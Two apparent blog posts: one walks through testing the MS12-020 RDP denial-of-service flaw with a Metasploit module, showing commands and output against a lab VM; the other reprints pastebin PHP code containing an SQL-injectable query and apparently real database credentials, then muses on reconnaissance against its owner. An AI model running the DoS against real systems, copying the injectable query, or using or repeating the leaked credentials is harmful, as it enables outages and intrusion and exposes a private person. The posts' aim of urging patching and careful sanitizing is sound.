MS12-020 RDP Vulnerability overview and testing

By now if you have been paying attention to your news readers, Google plus or twitter feed you would have noticed that Microsoft released a patch to a nasty denial of service (DOS) vulnerability. Here is a bit of information about the vulnerability; “This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol. The more severe of these vulnerabilities could allow remote code execution if an attacker sends a sequence of specially crafted RDP packets to an affected system.”

In short the system would crash and have a “blue screen of death” thus causing the system to reboot. Now the other option would allow and attach to have remote code execution on the affected system. Even though this patch was released over two weeks ago most organizations are still vulnerable and that’s not because the choose to be however most places have a  “patch cycle” which require extensive testing prior to deployment.

As explained by the fine people over at ISC Diary The Microsoft released patch has several reference KB’s which includes ” KB2671387 (Remote Code Execution – CVE-2012-0002) and KB2667402 (Denial of Service – CVE-2012-0152) or KB2621440. The reference for the update you’ll see on a Windows system, when installed, depends on the version of the OS you’re running. For Windows 7 you’ll likely note KB2667402, whereas you should only expect KB2621440 on a Windows XP host. As always before applying any patch ensure that you read the release notes.
We recently patched our internet facing servers that had RDP enabled and everything went well with the exception of one server that we were unable to log back into via RDP, we had to gain access to the server via the ILO port then applied a few additional patches then rebooted and that seen to solve the issue.Now for the fun part if you would like to test the proof of concept exploit for this vulnerability grab a copy of Metasploit follow the steps below.
 My Test setup:
  • Linux (SolusOS)
  • VirtualBox VM running Windows Server 2008 (with RDP enabled)

Launch msfconsole and follow the steps outlined here:

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf  auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
RHOST                   yes       The target address
RPORT  3389             yes       The target port

msf  auxiliary(ms12_020_maxchannelids) > set RHOST
msf  auxiliary(ms12_020_maxchannelids) > run

[*] – Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] – 210 bytes sent
[*] – Checking RDP status…
[+] seems down
[*] Auxiliary module execution completed

RHOST = The vulnerable host that is running a vulnerable version of RDP

Screenshot of server 2008 reacting to the exploit
Now go on out and patch your systems and if you have some time load Metasploit on a host of your choice and do some testing.



Being smart about testing your application

This is just going to be a short writeup on something I figure was worth mentioning. While going through pastebin I found the following entry  3 seconds after it was posted–> :


include ‘top.php’;

include ‘submenuhonorshall.php’;



$db = ‘gnemi_addison’;

mysql_connect(“”, “gnemi_root”, “ignurupi87”) or die(mysql_error());

mysql_select_db($db) or die(mysql_error());


<div id=”content”>

<h1>Honors Hall Library</h1>

<form method=”post”>

<p class=”norm”>

<select name=”searchby”>

<option value=”Author_First_Name”>Author First Name</option>

<option value=”Author_Last_Name” selected=”selected”>Author Last Name</option>

<option value=”Title”>Title</option>


<input type=”text” name=”query” />

<input type=”submit” value=”Submit!” />




$result = mysql_query(“SELECT * FROM `library` WHERE `'” . $_POST[‘searchby’] . “‘` = ‘” . $_POST[‘query’] . “‘ ORDER BY `Title` LIMIT 20”);

while ($row = mysql_fetch_array($result))


echo $row[‘Last Name’] . $row[‘First Name’] . $row[‘Title’] .$row[‘inout’];




include ‘../address.php’;

include ‘../phptemplates/bottomhall.php’;


Now to the average person that’s not a big deal, but to me after looking at that bit of php code the following questions came to mind:

  • Would I find anything useful if I were to Google the various pages referenced in that code or maybe the domain “”?
  • What if I ran a whois lookup against that domain what would I find?
  • What if I Google the email addresses associated with that domain?
  • And most importantly are the username and password referenced stilling being used currently?
  • Are those tables and DB name real or just test names?
  • Would I find anything interesting if I were to crawl that website?

Now a simple whois returned a valid email address along with some other useful information:

And just out of curiosity after visiting I was presented with the following:

Now I ***DID NOT LOGIN*** I repeat  ***DID NOT LOGIN*** so I don’t know if those credential are valid BUT what if the were? I am hoping for this person’s sake all of the above information is just for testing purposes but what if its no? Sanitizing all valid  information before posting it would have been nice.